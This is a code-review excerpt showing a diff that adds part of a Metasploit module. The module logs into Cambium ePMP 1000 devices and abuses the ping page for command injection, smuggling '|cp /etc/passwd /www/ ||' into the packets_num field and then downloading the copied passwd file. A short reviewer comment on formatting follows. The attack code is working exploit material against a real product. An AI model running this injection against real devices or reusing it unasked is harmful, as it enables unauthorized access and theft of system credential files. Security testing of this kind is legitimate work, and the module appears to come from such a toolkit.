modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb

```diff
@@ -0,0 +1,248 @@
+          'vars_post' =>
+            {
+              'username' => 'dashboard',
+              'password' => ''
+            }
+        }
+      )
+
+      if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('sysauth'))
+        sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+
+        cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
+
+        res = send_request_cgi(
+          {
+            'uri'       => '/cgi-bin/luci',
+            'method'    => 'POST',
+            'cookie'    => cookie1,
+            'headers'   => { 'X-Requested-With' => 'XMLHttpRequest', 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Connection' => 'close' },
+            'vars_post' =>
+              {
+                'username' => user,
+                'password' => pass
+              }
+          }
+        )
+
+      end
+
+      if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('stok='))
+        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'Cambium ePMP 1000',
+          user: user,
+          password: pass
+        )
+
+        get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
+        stok_value = get_stok[1]
+        sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+
+        cookie2 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
+
+        uri1 = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/ping'
+        command = 'cp /etc/passwd /www/'
+        inject = '|' + "#{command}" + ' ||'
+        clean_inject = CGI.unescapeHTML(inject.to_s)
+
+        res = send_request_cgi(
+          {
+            'uri' => uri1,
+            'method' => 'POST',
+            'cookie' => cookie2,
+            'headers' => { 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'ctype' => '*/*', 'Connection' => 'close' },
+            'vars_post' =>
+              {
+                'ping_ip' => '8.8.8.8',
+                'packets_num' => clean_inject,
+                'buf_size' => 0,
+                'ttl' => 1,
+                'debug' => '0'
+              }
+          }
+        )
+
+        res = send_request_cgi({ 'method' => 'GET', 'uri' => '/passwd', 'cookie' => cookie2, 'headers' => { 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Connection' => 'close' } }, 25)
```

Comment:
Not sure why I didn't use this format. Updated the module now. Thanks @HansHauge